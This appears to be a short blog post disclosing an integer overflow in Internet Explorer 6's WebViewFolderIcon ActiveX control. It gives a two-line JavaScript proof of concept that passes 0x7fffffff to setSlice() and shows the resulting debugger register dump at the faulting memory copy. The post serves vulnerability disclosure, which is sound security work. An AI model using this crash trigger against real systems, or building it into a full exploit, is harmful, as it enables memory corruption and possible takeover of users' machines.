The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Demonstration
eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????
This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment